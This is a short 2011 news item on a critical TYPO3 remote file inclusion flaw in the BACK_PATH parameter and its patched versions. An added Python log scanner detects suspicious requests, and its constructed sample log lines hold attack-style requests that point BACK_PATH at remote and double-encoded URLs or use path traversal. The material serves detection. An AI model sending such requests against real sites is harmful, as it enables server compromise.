TYPO3 critical security flaw patched


The TYPO3 developer team have identified a critical hole in the CMS which could allow an attacker to compromise a server. Insufficient checking of the BACK_PATH parameter in the AbstractController.php file enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The TYPO3 developers have been informed that attackers are already trying to intrude into users' servers on a large scale. The development team have now provided a patch and released the corrected versions 4.5.9 and 4.6.2. If you use TYPO3, we suggest you update immediately.

December 20, 2011
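
Because intrusion attempts are reported to be under way, administrators may want to check web server logs for requests that set BACK_PATH to a remote location. The following is an added example, not code from TYPO3 or from the original article: it assumes combined-format access logs and only inspects query strings, and the request path, hosts and IP addresses in the sample lines are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Client IP, request target and status from a combined-format access log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Value that begins with a URL scheme / stream wrapper (http://, ftp://, data:)
# or a protocol-relative //host reference, i.e. not a local relative path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_back_path(line):
    """Return a finding dict if BACK_PATH points at a remote resource, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == "BACK_PATH":
            decoded = fully_decode(value)
            if REMOTE_RE.match(decoded):
                return {"ip": m.group("ip"), "status": int(m.group("status")),
                        "value": decoded}
    return None

def scan(lines):
    return [hit for hit in map(suspicious_back_path, lines) if hit]

# Constructed sample log lines (documentation IPs, placeholder path and hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Dec/2011:10:01:02 +0000] "GET /placeholder/AbstractController.php?BACK_PATH=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.9 - - [20/Dec/2011:10:01:05 +0000] "GET /placeholder/AbstractController.php?BACK_PATH=ftp%253A%252F%252Fremote.example%252Fx.txt HTTP/1.1" 404 210',
    '192.0.2.44 - - [20/Dec/2011:10:02:11 +0000] "GET /placeholder/AbstractController.php?BACK_PATH=..%2F..%2F HTTP/1.1" 200 1830',
    '192.0.2.44 - - [20/Dec/2011:10:02:15 +0000] "GET /index.php?id=12 HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status against an installation that was not yet on 4.5.9 or 4.6.2 deserves a closer look at the server. Values sent in POST bodies do not appear in access logs and are not covered by this check.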